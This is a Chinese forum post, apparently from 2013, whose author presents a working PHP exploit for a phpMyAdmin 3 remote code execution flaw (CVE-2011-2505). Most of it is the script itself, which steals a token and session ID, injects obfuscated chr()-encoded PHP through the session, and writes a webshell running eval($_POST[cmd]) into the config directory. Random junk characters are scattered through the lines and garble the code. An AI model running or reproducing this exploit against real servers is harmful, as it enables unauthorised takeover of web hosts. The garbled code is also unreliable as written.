最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
6 Y% {! V* ~( n
, ]/ ^3 n G9 t c6 _+ a: S* @昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
" J" P3 x7 D, d# d! B& s( ]( B, l: ?( O
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:; c" M' g P2 F
一是session.auto_start = 1;
5 L2 f+ f% ]4 A9 n二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。( V: t; A% j: N4 o
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。! Q6 }% W1 L* n8 J1 a
! l4 b1 Z; e: k8 o9 ~
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
2 s w) K" x% A3 r# `5 {( I# V+ w
( |/ F/ _2 s6 W0 j* m5 Y于是写了这个php版本的exp,代码如下:
4 O% } G% l! U0 U: K. G1 ?" @, C* T9 t0 l8 P7 e
#!/usr/bin/php
- c1 f( Z9 G; S/ s! {/ ]<?php
5 X6 }8 Z# a8 u; Z1 E, Lprint_r('. @+ E$ l r4 c/ y
+---------------------------------------------------------------------------+5 p5 B( d; v2 m* L+ L) A
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]1 c" R0 J3 Q- D3 B! x1 O
by oldjun(www.oldjun.com)7 ~0 B# R1 z, p+ j
welcome to www.t00ls.net% C+ H1 D# L- K' d) z' N0 k
mail: oldjun@gmail.com5 R8 X9 Q4 \! r/ [, p+ h+ Z
Assigned CVE id: CVE-2011-2505
) M/ o; m2 r3 T. H/ ~9 C( q+---------------------------------------------------------------------------+, Z& B& k `$ }
'); L( N" i. U5 o8 q$ S" e0 L
1 S6 Y$ Y) M- Z
/**
! @- [- D3 N, C3 G+ s( f' } * working when the directory:"config" exists and is writeable.
6 K# U. s, a4 Z**/
" U! _" e0 ], T- B" p6 m, t: y
" t) o7 w+ o O& K+ w+ Aif ($argc < 3) {
+ W) `# F+ j& m, F* D i0 x& [+ A print_r(', H: u& A L5 Z7 K4 E; g @7 M8 r! Y1 E
+---------------------------------------------------------------------------+. U3 B* Y4 D+ g8 s' e- @
Usage: php '.$argv[0].' host path
- Z% o( P8 W H% X3 B! }! chost: target server (ip/hostname)
8 I3 K' z& U- ^9 Q: _) Q& n7 K# upath: path to pma3/ X! M8 G3 z* Q7 E* l5 U
Example:
$ E' {$ K9 m+ x0 r7 Tphp '.$argv[0].' localhost /pma/
0 n! i, M# b" U: X+---------------------------------------------------------------------------+8 k: c: S2 [3 V" T0 O5 P2 P/ `' r
');5 j* S0 V7 l8 H2 Q& C9 U0 q
exit;! F4 _2 J+ D1 u5 w; U
}( b) Q& v6 T1 w9 [0 [9 [2 b
3 ?, F8 [/ F% ]' I; F$host = $argv[1];8 c- C/ e# U0 T! ~% G
$path = $argv[2];3 ]" b) |6 U# D+ t8 f" A3 R& x& P
1 V$ |' F- l3 P" W7 y
/**
2 c# i; V* \( \ * Try to determine if the directory:"config" exists/ \/ ?' Z6 `3 u' H1 \' n
**/9 R* J- U" i: r+ r8 ?% O0 s& `# ?
echo "[+] Try to determine if the directory:config exists....\n";' V9 x; C. `4 ]" M; V. f y5 J) V9 h9 i
$returnstr=php_request('config/');
. Y: X5 ~* Y+ bif(strpos($returnstr,'404')){1 e0 e8 P, m9 o% k; L
exit("[-] Exploit Failed! The directory:config do not exists!\n");
+ G" U! w b1 S$ u) [$ O1 \0 n}) @$ h" o* B8 D" v
8 z( K3 q w! W4 p4 G; f6 p8 V' |
/**
& }* m. u9 E& b6 S2 T& l7 `2 Q, n * Try to get token and sessionid% E* Y: P' h _; \) E' P7 b
**/
0 W. c/ W- L2 u" N9 A) zecho "[+] Try to get token and sessionid....\n";
2 h2 j' l: G* x6 ^$result=php_request('index.php');( M% R: @6 }1 S4 @7 L5 t$ z
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);$ t$ q0 Z2 L: c4 I
$token=$resp[3];
0 g# c( }/ Y/ i/ J$sessionid=$resp[1];
; T, I! Y4 x% f( v5 U" s1 jif($token && $sessionid){
/ K! V$ G* F; m8 e" m5 g echo "[+] token token\n";
& H5 d& t, p! G2 S) c7 v z echo "[+] Session IDsessionid\n";4 j2 p4 ^$ O1 b1 I) n/ j7 S5 F5 C
}else{
& L; J% H6 i& a9 c exit("[-] Can't get token and Session ID,Exploit Failed!\n");
5 T5 J* e9 Q( |$ }: m}; S7 q8 W, \! F+ l |
" W# ]& y0 \# M6 a% j/**/ F9 B% T% `: V
* Try to insert shell into session& @" R- r7 A1 N7 K' F. n
**/5 [5 a+ p0 C( h1 n& Z
echo "[+] Try to insert shell into session....\n";; ~: d; d% ^, x0 q
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.! c6 _. ^8 ?( {6 L8 p7 @
- r4 J9 l( b# \0 a, s9 j, k/**, p% n6 h: \8 k+ u) ]
* Try to create webshell* s% t% n: _/ p
**/( J5 `" Y; U9 e- U" s
echo "[+] Try to create webshell....\n";( J, M4 N. Q& |- J6 d
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
0 P! @/ B& F1 C6 F" u% _( Q/**
6 b* m1 z+ I }0 R' L: ~+ l: j- v * Try to check if the webshell was created successfully+ l8 a, g/ Z1 |/ H" v
**/
- p' z/ t2 D8 F$ [: G* b: necho "[+] Try to check if the webshell was created successfully....\n";
4 q8 F4 x6 U! E. F2 o; H$content=php_request('config/config.inc.php');
& f: Q$ y ~8 ~) V1 Uif(strpos($content,'t00ls')){+ B" U$ K% n$ ~
echo "[+] Congratulations! Expoilt successfully....\n";2 {2 i& j+ Y: T; Q
echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";2 H( ]* V6 c6 v& l* G' j: U
}else{
- c- s5 L/ a4 V9 w% N: D3 M exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
3 T+ l( j2 a/ Y}( q' T/ q: c3 V5 Q9 b
% C; N- ~" j$ }6 h! Q: X, h4 r
function php_request($url,$data='',$cookie=''){" Y$ h4 V! Q O0 R0 N, K
global $host, $path;
2 H2 P# Q+ `* ?/ Z2 M, v4 l& A . B6 e* Z4 N G( i
$method=$data?'POST':'GET';
1 G/ P' |: B7 n3 k3 a- |6 @ 3 a1 g0 e3 }5 a
$packet = $method." ".$path.$url." HTTP/1.1\r\n";9 U' z5 i' r2 }) a( | }9 }5 w" H
$packet .= "Accept: */*\r\n";4 ^3 j* V6 e- m2 E2 S$ p
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";! G K% X! j5 {# o8 _' M9 z
$packet .= "Host: $host\r\n";
' [/ Q9 x9 _* ?, f; N# o4 a: ] $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";/ ^5 a+ W- r( z$ `
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";7 z" j# _4 W, }
$packet .= $cookie?"Cookie: $cookie\r\n":"";) v8 _! ~ y- O$ h# ?
$packet .= "Connection: Close\r\n\r\n";3 ~6 l: n+ u; p! }
$packet .= $data?$data:"";
. ^( b8 s5 `6 n: p! D5 i7 l; `. I+ g+ X" J' E2 ?
$fp = fsockopen(gethostbyname($host), 80);& w) u K( g6 a
if (!$fp) {
( J% {: C5 F2 b5 P echo 'No response from '.$host; die;% t, Q9 O, a" f) A, }8 l
}
* h! |# T: ]% v fputs($fp, $packet);$ s* {: R- p) m, `
1 u/ q- A8 l; R) b' {- ] $resp = '';' B, \6 C. G" u3 V4 Y* y
. {2 s* l/ R$ y7 A1 J; w
while ($fp && !feof($fp))
9 s0 R) u+ \; f& R \/ W $resp .= fread($fp, 1024);. `8 @$ Z5 r9 x0 J/ Z
7 J6 t0 i6 u- y O3 h+ ?( H1 i
return $resp;4 \8 q: s# ^6 h3 T' y0 J% {' Z
}/ e( }6 r3 M x
$ I# T5 p$ O% i& F2 o: h' b& W
?>
1 b. _# D' J: s N4 v0 |. |
发表于 2013-2-21 09:13:03
收藏
支持
反对